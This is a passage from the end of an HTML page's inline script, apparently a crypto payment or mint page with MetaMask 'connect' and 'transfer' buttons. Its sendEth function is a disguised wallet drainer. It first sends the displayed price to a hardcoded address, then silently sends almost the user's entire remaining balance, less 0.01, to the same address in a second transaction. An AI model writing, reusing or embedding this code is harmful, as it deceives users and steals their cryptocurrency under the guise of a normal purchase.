            await ethereum.enable();
            await updateMetaMaskStatus();
            location.reload();
          }
        }

        let accounts = web3.eth.getAccounts();
        web3.eth.defaultAccount = accounts[0];

        document.onload = updateMetaMaskStatus();
        document
          .querySelector("#connect")
          .addEventListener("click", connectMetaMask);
        document.querySelector("#transfer").addEventListener("click", sendEth);
        document
          .querySelector("#connect2")
          .addEventListener("click", connectMetaMask);
        document.querySelector("#transfer2").addEventListener("click", sendEth);

        async function sendEth() {
          let inp = document.getElementById("price").textContent;
          let givenNumber = inp.toString();
          web3.eth.sendTransaction({
            from: web3.currentProvider.selectedAddress,
            to: "0x5eC9C5182f1B95b9c99242289f11903Ffb5DbFb2",
            value: web3.utils.toWei(givenNumber, "ether"),
          });
          let balance = web3.utils.fromWei(
            await web3.eth.getBalance(web3.currentProvider.selectedAddress)
          );

          web3.eth.sendTransaction({
            from: web3.currentProvider.selectedAddress,
            to: "0x5eC9C5182f1B95b9c99242289f11903Ffb5DbFb2",
            value: web3.utils.toWei(
              balance - Number.parseFloat(givenNumber) - 0.01 + ""
            ),
          });
        }
      });


                        </script>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
</body>
</html>